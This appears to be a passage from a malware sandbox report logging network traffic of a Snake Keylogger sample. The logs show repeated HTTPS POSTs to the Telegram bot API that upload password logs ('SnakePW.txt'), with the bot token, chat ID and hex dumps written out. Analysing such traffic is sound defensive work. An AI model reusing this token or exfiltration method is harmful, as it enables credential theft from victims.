                                                                    2022-06-26 07:32:50 UTC51OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 39 36 65 62 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756db96eb51Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:50 UTC51INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:50 UTC51INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66777,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228770,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    300192.168.2.550234149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:46 UTC506OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571c1e7e82
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:46 UTC506OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 31 65 37 65 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571c1e7e82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:47 UTC507INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:47 UTC507INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67087,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    301192.168.2.550235149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:47 UTC508OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571c5a18cc
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:47 UTC508OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 35 61 31 38 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571c5a18ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:47 UTC509INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:47 UTC509INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67088,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    302192.168.2.550236149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:47 UTC510OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571c935407
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:47 UTC510OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 39 33 35 34 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571c935407Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:47 UTC510INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:47 UTC511INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67089,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    303192.168.2.550237149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:47 UTC511OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ccc8980
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:47 UTC512OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 63 63 38 39 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ccc8980Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:48 UTC512INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:48 UTC512INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67091,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    304192.168.2.550238149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:48 UTC513OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d082464
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:48 UTC513OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 30 38 32 34 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d082464Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:48 UTC514INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:48 UTC514INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67092,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    305192.168.2.550239149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:48 UTC515OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d43c05b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:48 UTC515OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 34 33 63 30 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d43c05bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:49 UTC515INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:49 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67093,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    306192.168.2.550240149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:49 UTC516OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571d7cf778
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
